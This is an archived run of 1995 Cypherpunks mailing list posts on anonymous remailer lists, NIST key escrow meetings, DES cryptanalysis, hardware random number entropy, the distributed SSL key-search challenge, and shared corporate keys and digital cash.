Is there an online version of Raph's anonymous remailer list for FTP
or on the web? I suddenly need to give it to someone.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjl <cjl@welchlink.welch.jhu.edu>
Date: Wed, 23 Aug 95 13:12:06 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Remailer list pinging by e-mail
In-Reply-To: <199508231956.PAA10953@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950823160647.29928B-100000@welchlink.welch.jhu.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Perry E. Metzger wrote:

> 
> Is there an online version of Raph's anonymous remailer list for FTP
> or on the web? I suddenly need to give it to someone.
> 
> .pm
> 


Try sending a message to 

mg5n+remailers@andrew.cmu.edu 

the automagical reply should be the most current listing of Raph's list.



C. J. Leonard                     (    /      "DNA is groovy"
                                   \ /                - Watson & Crick
<cjl@welchlink.welch.jhu.edu>      / \     <--  major groove
                                  (    \
Finger for public key               \   )
Strong-arm for secret key             /    <--  minor groove
Thumb-screws for pass-phrase        /   )





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Wed, 23 Aug 95 13:14:45 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <Pine.D-G.3.91.950817035141.3096A-100000@dg.thepoint.net>
Message-ID: <9508232014.AA18754@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


A FBI document reads:
# To ensure that this occurs, legislation mandating the 
# use of Government-approved encryption products or 
# adherence to Government encryption criteria is required.

Ex-AAG Jo Ann Harris told a Senate Judiciary Subcommittee in 1994:
$ we have absolutely no intention of mandating private use of a particular
$ kind of cryptography, 

I ranted:
% Just what real legal recourse do we have against lying scum in the
% bureaucracy ?  

Brian Davis writes:
> You sure are anxious to prosecute government officials.  

You're damn right I'm anxious to prosecute government officials who appear
to have willfully lied about public policy in testimony before Congress !

Look, plenty of people here are honest-to-[insert your higher power of
choice here] anarchists. I happen to be at most an anarchogroupie ;) and
I'm reasonably comfortable with the U.S. version of representative democracy.

[Note to the list: I'm not looking to spark any sort of debate about political
philosophy, on or off the list. I'm not interested in arguing semantics, so 
don't bother trying.]

For representative democracy to be even vaguely democratic at all, the
representatives need to level with their constituents as much as possible.
I certainly intend to hold public officials speaking in an official
capacity about official business to a high standard of conduct. 

> What is untrue about her statement.  Maybe she meant it's OK to use
> ROT-13 but nothing else ...

How could that be compatible with "no intention of mandating...a particular
kind of cryptography" ?

> And you guys complained about the Jake Baker prosecution!

Non-sequitur. How is the Baker case relevant to this ?

-Futplex <futplex@pseudonym.com>
"Say goodbye to the clowns in Congress" -Elton John/Bernie Taupin



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 23 Aug 95 07:46:57 PDT
To: cypherpunks@toad.com
Subject: Upcoming Key Escrow Meetings
Message-ID: <199508231446.QAA03234@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



August 22, 1995

MEMORANDUM

From:  Ed Roback, NIST

Subject:  Upcoming Key Escrow Meetings

Attached for your information are notices of two upcoming
key escrow-related meetings.  The first, to be held on
September 6-7 at NIST will focus on two principal topics: 
1) discussion of finalizing the criteria for the
exportability of software key escrow encryption with
64-bit key space; and 2) the desirable characteristics
for key escrow agents.  The second will be held on
September 15 at the Gaithersburg Hilton and will focus on
the development of Federal Information Processing
Standards for key escrow encryption, specifically to
include software implementations.

You are invited to attend one or both meetings and, if
you so choose, to speak at these meetings.  I hope to
have sufficient time for discussion, and therefore
encourage presentations to be clearly focused on the
topic at hand.

If you wish to attend, please notify me [sic] secretary, Arlene
Carlton on 301/975-3240, fax: 301/948-1784 or e-mail:
carlton@micf.nist.gov.  Also, please let her know if you
would like to make a presentation with your
recommendations on either topic, or propose an additional
topic.  If you have any additional questions or
suggestions, please feel free to contact me on
301-975-3696.

Attachments (2)

             ----------------------------

                 Meeting Announcement:
                   Key Escrow Issues

The Commerce Department's National Institute of Standards
and Technology invites industry representatives and other
interested parties to a meeting on September 6 and 7, to
discuss issues related to key escrow encryption.  While
not limited, two principal agenda items for discussion
will be: 1) developing the criteria for software key
escrow encryption exportability and 2) the desirable
characteristics for U.S. key escrow agents.

Industry has asked the government for criteria for the
export of software key escrow encryption.  Rather than
simply publishing criteria, however, the Administration
desires consultations with industry in preparing final
criteria for publication.   This session of the meeting
will begin with a presentation of the government's
perspective of the desirable criteria, followed by a
chance for other participants to offer their thoughts on
this issue as well as reaction to the federal
perspective.  Under acceptable criteria, the government
is willing to allow for the export of strong cryptography
(e.g., DES) when coupled with a key escrow mechanism.  It
is anticipated that this would be coupled with a one-time
product review (e.g., as is the case for RC2/RC4
products) by the Department of State.  Following such
approval, the Department of Commerce would administer
export regulations.

The second session of the meeting will address the
desirable characteristics of acceptable U.S. escrow
agents.  Clearly, if export of key escrow encryption
products will be allowed, the cryptographic keys must be
stored with some entity.  This session will address the
criteria for the approval of such organizations.

It may also discuss what sort of legal protections, if
any, may be necessary to provide, for example, against
unauthorized release of encryption keys.  Follow-up
meetings to both issues may be necessary.

Other related topics may be included, time permitting. 
Note that a separate meeting has been scheduled for
9/15/95 to discuss the development of federal standards
for key escrow encryption.

Government representatives will attend from the Office of
Science and Technology Policy, the Department of State,
the Department of Justice, the Department of Commerce,
the National Security Agency, and the Federal Bureau of
Investigation.

If you would like to make a presentation with your
recommendations on either topic, or propose an additional
topic, please contact Ed Roback at NIST on 301-975-3696. 
Presentations may be limited in length to accommodate all
speakers.  The meeting will be open to the public,
although seating is limited. Advance registration is
requested, please contact Arlene Carlton on 301/975-3240,
fax: 301/948-1784 or e-mail: carlton@micf.nist.gov.  The
meeting will be held at the NIST in Gaithersburg,
Maryland.

8/17/95

              ---------------------------

                Workshop Announcement:
        Developing Federal Key Escrow Standards

On September 15, 1995, the Commerce Department's National
Institute of Standards and Technology will hold an
exploratory workshop on developing Federal Information
Processing Standards (FIPS) for key escrow encryption,
specifically to include software implementations.  This
effort is being initiated to further the Administration's
commitment to federal use of key escrow encryption.

Industry representatives and other interested parties are
invited to the workshop to provide their perspectives on
the desirable characteristics of key escrow encryption
standards to NIST and other federal officials. 
Government representatives also will present their
objectives and preliminary approach to this standards
development process.  Discussion will also include
proposals for follow-on activities.

For discussion purposes, one initial option for this
standards activity may be to create a generic key escrow
encryption standard containing criteria for federal use
of key escrow techniques implemented in either software
or hardware.  This high-level standard could then be
supplemented with lists of validated key escrow
techniques.  (Currently FIPS 185, "Escrowed Encryption
Standard," a hardware-based standard, is the only
FIPS-approved key escrow technique.)  Guidance would also
be needed to guide selection of appropriate key escrow
techniques for particular applications.  Key escrowing
will be used by federal agencies (and others, if they so
choose) in conjunction with FIPS-approved encryption
techniques.  Development and implementation of such
standards are necessary to guide federal agencies in
effectively and securely implementing key escrow
encryption.

If you would like to make a presentation with your
recommendations for the development of federal key escrow
standards, please contact Ed Roback at NIST on
301-975-3696. Presentations may be limited in length to
accommodate all speakers.

The meeting is open to the public, although seating is
limited to approximately 100 individuals.  Advance
registration is requested; please call Arlene Carlton on
301/975-3240, fax: 301/948-1784 or e-mail:
carlton@micf.nist.gov to register.  The meeting will be
held at Gaithersburg Hilton Hotel, 620 Perry Parkway,
Gaithersburg, Maryland.

8/17/95 

--












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dan@milliways.org  (Dan Bailey)
Date: Wed, 23 Aug 95 12:50:05 PDT
To: andrew_loewenstern@il.us.swissbank.com
Subject: Re: DES & RC4-48 Challenges
Message-ID: <199508231949.AA25702@ibm.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 95 11:53:22 -0500 you wrote:

>Dan Bailey writes:
>>  According to Biham and Shamir's Differential Cryptanalysis of DES,
>>  "An interesting feature of the new attack is that it can be applied
>
>If I read this correctly, then the keys used for generation of the chosen  
>plaintext-cyphertext pairs is irrelevant and once the required computation is  
>done, one can crack any '...one of the keys can be cputed in real time while  
>it is still valid.'..
>
I haven't read this entire book, mainly because a lot of it is over my
head with some pretty esoteric proofs.  The impression I got was that
if the cryptanalyst is steadily keeping up with the key changes until
he collects the required 2^36 from a pool of 2^47 valid
plaintext/cyphertext pairs, he then can recover the last key used.  I
don't understand what constitutes a "valid" pair in this context. 
Also, I'm not sure if all the computation he's done to get to that
point is applicable in his attack on the next key.  It appears not. 
If all of his precomputation was somehow salvagable, I think we'd
already have heard about someone actually doing it.
	But then again, I don't understand how his precomputation could *not*
be applicable. He'd just have to drop off the computations done for
the first key.  Perhaps the difficulty in this problem comes from not
knowing when the source is changing keys.
	According to Schneier, "To get the requisite data for this attack,
you have to encrypt a 1.5Mbits/second data stream of chosen plaintext
for almost three years." (240)  With the massively-parallel nature of
Cypherpunks, this is probably feasible, assuming we could figure out
what needed to be done.
	Another angle is cracking a reduced-round version of DES.  8-round
DES can be analyzed in 2^9 using differential cryptanalysis.  Since
I'm sure the press doesn't really understand using multiple rounds in
iterated cryptosystems, maybe that little detail would slip by.  2^9
could easily be handled by an Alpha in the evening.
						Dan

>So what, exactly does this mean?  Can I do most, if not all of the feeding of  
>chosen plaintext into my personal DES box in my basement, do the required  
>computation (admittedly there is a lot of work to do here), then go out and  
>start breaking wire-transfers with a minimal of chosen plaintext?  That is  
>what the above quotation would seem to imply.
>
>Seems incredible...  I surely must be reading much more into the passage than  
>is really there...
>
>andrew
>
>
>
******************************************************************************
"I think, therefore I am" - Descartes                            Dan Bailey
"I don't think, therefore I'm a moustache." - Sartre		    dan@milliways.org
Worcester Polytechnic Institute and The Restaurant at the End of the Universe
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@austin.ibm.com>
Date: Wed, 23 Aug 95 14:57:33 PDT
To: John Young <jya@pipeline.com>
Subject: Re: RUB_han
In-Reply-To: <199508171545.LAA10941@pipe1.nyc.pipeline.com>
Message-ID: <9508232157.AA18612@ozymandias.austin.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain


How does one go about retrieving the text of these articles?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ab411@detroit.freenet.org (David R. Conrad)
Date: Wed, 23 Aug 95 15:00:49 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 in DOS
Message-ID: <199508232159.RAA28864@detroit.freenet.org>
MIME-Version: 1.0
Content-Type: text/plain




nobody wrote:
>im looking for a md5 binary that will run on dos.
>can anyone give me a pointer?

There is a program for DOS called MDx which does both MD4 and MD5, and is
pretty fast, too.  It can be found at:

ftp://oak.oakland.edu/SimTel/msdos/fileutil/xsum11.zip

or

ftp://garbo.uwasa.fi/pc/fileutil/xsum11.zip

Or at mirrors of the SimTel or Garbo archives.  I cannot claim to be
unbiased, though -- I wrote it (with a little help from Phil Karn's
fast assembly MD5 translate function!)  xsum 1.1 is freeware.

--
David R. Conrad, ab411@detroit.freenet.org, http://www.grfn.org/~conrad
Finger conrad@grfn.org for PGP 2.6 public key; it's also on my home page
Key fingerprint =  33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
Jerry Garcia, August 1, 1942 - August 9, 1995.  Requiescat in pace.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 23 Aug 95 15:31:19 PDT
To: Andrew.Spring@ping.be
Subject: Re: Random Hiss from Mac mike
In-Reply-To: <199508232105.OAA27566@comsec.com>
Message-ID: <9508232228.AA17098@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 23 Aug 1995 19:09:35 +0100
>From: Andrew.Spring@ping.be (Andrew Spring)



>I've been looking at using the Mac's Sound Input Manager for hardware RNG.

[...]

>I suspect there's much less entropy in that signal than even this estimate,

[...]

>Does anybody have any experience/advice in this area?

I would try injecting noise and seeing how well you can control the output
signal.  I would also do a Fourier transform of the output and look for
cyclic behavior -- then see how the frequency spectrum can be modified by
turning machinery on and off, turning radios on and off, ....

You can also try various compression algorithms to see how much entropy
they claim to see.

When that's done, you can then use some of my ranno conditioning code,
free on the net (although written for UNIX, for now):

	http://www.clark.net/pub/cme/html/ranno.html

I especially like running a pseudo-random stream through ranM and then a
hash, to obliterate any patterns which might sneak past your analysis.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme/home.html  |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+----------------------------------------------------------- Jean Ellison -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Wed, 23 Aug 95 15:59:15 PDT
To: Andrew.Spring@ping.be (Andrew Spring)
Subject: Re: Random Hiss from Mac mike
In-Reply-To: <v01510106ac5cd6edbafb@[193.74.217.20]>
Message-ID: <199508232258.SAA24087@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Take a look at RFC 1750.  It discusses randmoness.  If your
input to MD5 consists of two long strings of constants, your output
from MD5 only has really a very few bits of entropy (I think you end
up with 7, or possibly 14 if there are two transitions.  Not a lot of
entropy at all.)


| I've been looking at using the Mac's Sound Input Manager for hardware RNG.
| The advantage of it is that (1) most macs have a microphone port these
| days, (2) it doesn't involve any user interaction, (3) the API is easy.
| 
| What I don't know, is how secure it is.  Or more precisely, I don't know
| how much entropy is contained in the signal.
| 
| In the simplest case, where the microphone is not attached, the signal
| consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
| problem transforming this into uniformly distributed RN's : just hash the
| buffer with MD5.

	Again, the output of a hash is only as good as its input.  If
you input 40 random bits, and 88 known bits, we only need to search
the 40 known bits.  If you input a string of the form 00000011, with 2
runs of some length, we don't have to search 11100111 as a
possibility.  There are only 8 strings which match if your constraints
are 8 bits, starting with 0, and only a single transition to a
different state.  So, by knowing those rules, we only have to search
2^3 strings instead of 2^8.

	If there isn't a microphone, and the OS gives you a steady
stream, then the sound port is a bad source of randomness, even with a
hash.  Use mouse movement, keyboard input, or the parity of long
strings of either of those.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Wed, 23 Aug 95 10:09:32 PDT
To: cypherpunks@toad.com
Subject: Random Hiss from Mac mike
Message-ID: <v01510106ac5cd6edbafb@[193.74.217.20]>
MIME-Version: 1.0
Content-Type: text/plain


I've been looking at using the Mac's Sound Input Manager for hardware RNG.
The advantage of it is that (1) most macs have a microphone port these
days, (2) it doesn't involve any user interaction, (3) the API is easy.

What I don't know, is how secure it is.  Or more precisely, I don't know
how much entropy is contained in the signal.

In the simplest case, where the microphone is not attached, the signal
consists of  long runs of '0x80's alternating with '0x7f's.  Now, I have no
problem transforming this into uniformly distributed RN's : just hash the
buffer with MD5.

My question is, how many bytes get fed into the hash?
Obviously, enough bytes so that I have 128 bits of entropy.

Preliminary tests give me a max entropy of about .65 bits per sample byte.
That's not very much, but if I can sample at ~20 KHz, that's 1625 bytes per
second.

That's estimated by recording the length of runs and computing the entropy over
the entire sample: i.e. the sum (for k = 1 to 120) of -(fraction of runs of
length k * log2 of that fraction). That works out to about 3.3 bits per run
with an average run of 5.1 bytes.

I suspect there's much less entropy in that signal than even this estimate,
but I don't have any way to conduct tests with pure 50 cycle power and
uniform ambient temperature.  Or whatever else biases the signal.  For all
I know, every time someone in this building starts his microwave it biases
the signal.

Does anybody have any experience/advice in this area?

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 23 Aug 95 16:15:17 PDT
To: cypherpunks@toad.com
Subject: PacBell's idea of a good password
Message-ID: <199508232310.TAA08757@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the PacBell Messsage Center (voice mail) brochure:
"Make it easier to remember your password by choosig a code you use
already, i.e. a PIN number or birth date."

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMDu1OyoZzwIn1bdtAQEvlAF+ObOioS3uF8obI6BRhtjfkZdvRAztTlUa
uCjeR0AH2MzNEgTFM0mCSXuTnyy/trG0
=rg3O
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Wed, 23 Aug 95 12:05:39 PDT
To: cypherpunks@toad.com
Subject: Re: The sorry state of non-US crypto
Message-ID: <9508231905.AA28419@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain



>Italy:   ftp://ftp.dsi.unimi.it/pub/security/crypt/
>UK:      ftp://ftp.ox.ac.uk/pub/crypto/
>Croatia: http://pgp.rasip.fer.hr/
>Germany: ftp://ftp.darmstadt.gmd.de/pub/crypto/

Don't forget Australia: http://psych.psy.uq.oz.au/~ftp/Crypto/
It's especially relevant because there is a version of Mosaic
that uses 128-bit SSL (i.e. truly secure).  I have most of these
pointers in my SSL crack Web page (which has evolved quite a bit
in one week).

-- Damien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Wed, 23 Aug 95 21:48:42 PDT
To: cypherpunks@toad.com
Subject: Linux brutessl client
Message-ID: <199508240448.VAA12304@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Hi.

I've been able to compile a working brutessl 1.02 cllient under linux
and gcc 2.7.0, but I get abysmal search speeds.

My system is a pentium 60, which, according to the docs, ought to have
a speed of something over 14100 kps (that's what a 486dx2/66 with no
rotate left macro gets).

brutessl -t reports that my system can do 11200 keys per second.

Is there any obvious reason this number is so much lower than
expected?  I'm reasonably certain gcc implemets a rotl macro, but I
don't know how to make use of it -- has anyone out there gotten
assembly.c to compile under gcc?

Finally, are there any additional optimizations for pentium machines
available?

thanks,
-sq




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 23 Aug 95 21:56:56 PDT
To: cypherpunks@toad.com
Subject: Shared secrets and corporations in Cyberspace.
Message-ID: <199508240456.VAA06659@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


How can collective entities hold keys?


Corporations derive their cohesion partly from realspace coercion, and
partly by trust based on face to face interactions among the participants,
and partly from their brand name.  Trusts derive their cohesion primarily
from trust, again based on face to face interaction.

A cyberspace corporation would derive its cohesion primarily from its name
identification and the public key associated with its brand name.  Consumers
would presumably wish there financial instruments to be signed to the public
key of Megacorp life insurance, rather than Megacorp's insurance saleman,
for fear that otherwise their funds might go astray, or they might get bad
software, etc, and the private key corresponding to that public key will
sign the employees paycheques.

If a cyberspace corporation does not have a valued brand name it is likely
to disintegrate into its components, in the way that some realspace
corporations did in the boisterous early days of silicon valley.

But this creates a problem of "owning the corporation". If one man knows the
corporations secret key, he can pretty much tell the shareholders to go take
a hike.  If two men know the secret key, it probably will not remain secret
much longer.

One solution is to use truenames, rather than keys as the "real identity" --
set up financial transaction software so that it considers that any key
signed by a proper authority certifying the key to be the key of Megacorp is
a valid Megacorp key, that all such keys are equivalent, and that the
authority will only issue keys to one entity called Megacorp.  Then when
folk start fighting over who is the real Megacorp, the authority resolves
the dispute by conventional means.

Current proposals for transaction software are based on truenames and
trees-of-trust.  This is not too bad as long as we have a forest, not a
single tree, but still, one would like to have some arrangement whereby a
large number of people could share a single key, and can buy and sell
interests in that key, whereby we can have the mechanisms of shared
ownership without the need for an external authority to enforce it.

Obviously trusts will work fine in Cyberspace, but trusts are by their
nature small and undemocratic.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Wed, 23 Aug 95 22:28:20 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <199508240528.WAA09482@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 12:01 PM 8/22/95 -0400, Robert Hettinga wrote:
> It's easy
> to see how a combination of certification technology and cryptographically
> anonymous voting protocols allow the direct election of a company's board
> members without proxies -- another hierarchical device -- for instance.

It is not so easy for me to see how such protocols allow the 
shareholders to control the company's keys if the CEO 
tells the shareholders to go and stick their heads 
in a bucket.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 23 Aug 95 19:59:21 PDT
To: cypherpunks@toad.com
Subject: Re: The End of the Ecash Trial?
In-Reply-To: <v02120d04ac6112134b53@[199.0.65.105]>
Message-ID: <9508240258.AA22751@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>The problem with being a bank is the price of the bank software, which is
>where David Chaum and Co. want make their money.  Thus, the last price I
>got (offhand) from David on the phone a year ago was $250k + 10% of net
>profits.  Given the cost of hardware, people, lawyers, and if you actually
>back the certificates with dollars in a bank of deposit (not being what we
>want do to here, admittedly) bankers, and more lawyers.  Could add up to a
>mulitmillion dollar proposition.

So Dave expects a Bank to pay him $250,000 + 10% so they can't find anything 
out about their customers spending habits.

Dosen't sound as if its all that tempting a proposition for them, they are 
expected to both create the market and pay the monopolist to participate in it. 

If Chaum had given his system away, got everyone using it he might have a 
Netscape type situation. As it is I can't see a great deal of incentive for the 
people he expects money from to give it him.

I don't think this is a going proposition at the moment. 

It might work for Motorway service tolls and such. I can easilly see a method of 
getting a political party to buy into such a scheme. It would be kind of ironic 
given the political motivations of most annonymous payment supporters if the 
government turned out to be the only organisation likely to buy the product.

Personally I don't like Motorway service tolls.

Any other people have some ideas about people likely to pay 0.25 M +10% of 
profits? Perhaps it could be used for gambling?


		Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com (David Mandl)
Date: Wed, 23 Aug 95 20:09:03 PDT
To: perry@piermont.com
Subject: Re: is there...
Message-ID: <v01530500ac619d829e4a@[166.84.250.21]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:56 PM 8/23/95, Perry E. Metzger wrote:
>Is there an online version of Raph's anonymous remailer list for FTP
>or on the web? I suddenly need to give it to someone.
>
>.pm

http://www.cs.berkeley.edu/~raph/remailer-list.html

   --D.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Wed, 23 Aug 95 21:15:32 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <199508240410.AA14034@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



The other night I heard that some of the rules for selling stock have
been changed to allow companies to sell stock directly to investors.
I have been thinking that this may have the potential to support an
interesting system.

Imagine "Portfolio Accounts" with a debit-card like access method.
Instead of paying for an item at a store with money or credit you use
your Portfolio-Account card and buy the item with shares/micro-shares
of stock. Stock brokers may offer this type of service in response the
competition of companies bypassing them. Stock brokers could setup
services that mediate between transactions calculating trades and values
"on-the-fly" (anonymity could be tricky to build into this system).

If the company you worked for paid you with stock instead of money this
would complete the loop.

Portfolio Accounts could be "cashed out" but if they have all of the
attributes of money and don't suffer from inflation why not keep your
stock invested.

This also has the interesting feature of avoiding all taxes. Until you
"cash out" your account you would not have to pay taxes, if you never
need cash out your account, you never need to pay taxes. I suspect that
our friendly governments would try to "correct" this "problem" in the
long run if they can.

Steven Weller writes:

[snip]
> 
> In such a system, where does credit come in? If I have a certificate that
> is worth X, then does the recipient know that it's from my "credit card"?
> How do I obtain credit, and in what form does it exist?
>

Could credit be supported by distributed futures market system?

> 
> Furthermore, how do we assess the value of real physical things in a system
> like this?

If you had a stock transaction mediated economy the "currency" in this
system would be backed buy the goods and services produced by companies
issuing stock.

You could view stock in this system as private currencies, and there
would be thousands of competing currencies.

I have been thinking that this might be a viable path to denationalized
currencies.

Stock certificates could be based on crytographic verification protocols.
If all the stock in this system were 'bearer-based' (i.e., you posess it you
own it) you could also support cash-like anonymity as well.

>
> 
> --
> Steven Weller  <Windsor Consulting Group>         +1 502 454 0054 (voice)
> OS-9 Consultancy and Software                       +1 502 451 5935 (fax)
> Finger for public key    00 02 3C 2F 83 76 D3 77  2A 95 E8 90 94 9A 9D 74
> http://iglou.com/windsorgrp   stevenw@iglou.com or realtime@well.sf.ca.us
> 
>

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the the Turing Test.     ]
[                   Alan Penny, penny@tyrell.net                          ]
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Wed, 23 Aug 95 23:29:09 PDT
To: cypherpunks@toad.com
Subject: Shared secrets, virtual corporations
Message-ID: <199508240628.XAA00538@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


< Collective holding of signer keys >

There are protocols that allow a group of people to collectively hold a
key. A message is passed down the line, each person in turn operating
on it, and at the end it has been signed. In this way the board of
directors can sign a message without any one person having the key.

These protocols can probably be combined with a secret-sharing system,
so that a message can be signed if a certain percentage of the
key-share holders collaborate. This allows voting, with the object of
the vote getting signed only if >50% vote for it.

Taking a share away from someone is a bit of a problem. If someone
needs to lose his voting privileges, you probably have to generate a
new key and sign it with the old one, then revoke the old one.

						Mike



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 23 Aug 95 23:00:26 PDT
To: cypherpunks@toad.com
Subject: Re: e$: The Book-Entry/Certificate Distinction
Message-ID: <ac6162493c02100413f2@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:10 AM 8/24/95, Alan Penny wrote:
>The other night I heard that some of the rules for selling stock have
>been changed to allow companies to sell stock directly to investors.
>I have been thinking that this may have the potential to support an
>interesting system.

My company sold stock to me directly, through a Stock Participation Plan
and an Incentive Stock Option Plan.

>Imagine "Portfolio Accounts" with a debit-card like access method.

I use a debit card which directly accesses my stock account. More on this
in a moment.

>Instead of paying for an item at a store with money or credit you use
>your Portfolio-Account card and buy the item with shares/micro-shares
>of stock. Stock brokers may offer this type of service in response the
>competition of companies bypassing them. Stock brokers could setup
>services that mediate between transactions calculating trades and values
>"on-the-fly" (anonymity could be tricky to build into this system).

This is where it breaks down. Stock prices are denominated in dollars (or
the local currency, as applicable). And local purchases are denominated in
dollars. Nobody pays "one microMicrosoft" for a loaf of bread. They pay $1.
And Microsoft stock sells for $100, not 100 loaves of bread.

>If the company you worked for paid you with stock instead of money this
>would complete the loop.

The IRS and other tax authorities have this one figured out: barter
economies are not generally a way to avoid taxes.

>This also has the interesting feature of avoiding all taxes. Until you
>"cash out" your account you would not have to pay taxes, if you never
>need cash out your account, you never need to pay taxes. I suspect that
>our friendly governments would try to "correct" this "problem" in the
>long run if they can.

If you are paid in barter for some service, taxes are still owed, based on
the estimated value of services rendered.

By the way, a simpler example than all this talk of partial shares of
companies is simply to talk about paying each other in gold, or oil, or any
other commodities.

Try to convince the IRS that taxes are not owed because one was paid in
ounces of gold instead of dollars.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Wed, 23 Aug 95 23:35:16 PDT
To: ecm@ai.mit.edu
Subject: Re: Subject: ANNOUNCE: 2nd SSL challenge - we need your compute!
Message-ID: <v03002c09ac61c9f67554@[198.93.25.31]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:16 23.8.95, aba@dcs.exeter.ac.uk wrote:

> Any platforms you would like to see pre-compiled binaries for, send them
> along, the source code is available from the ftp, and http addresses
> above.  A MAC binary would be nice also.

I have a working version of BruteSSL 1.02 (without SKSP client) for
Power Macintosh. However, as I don't want to run the risk of violating
ITAR, I'm still investigating ways of making it available. Suggestions
are welcome.

Stephan

________________________________________________________________________
Stephan Somogyi            Wer bremst hat Angst            Digital Media







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: zinc <zinc@zifi.genetics.utah.edu>
Date: Wed, 23 Aug 95 22:44:43 PDT
To: Sam Quigley <poodge@econ.Berkeley.EDU>
Subject: Re: Linux brutessl client
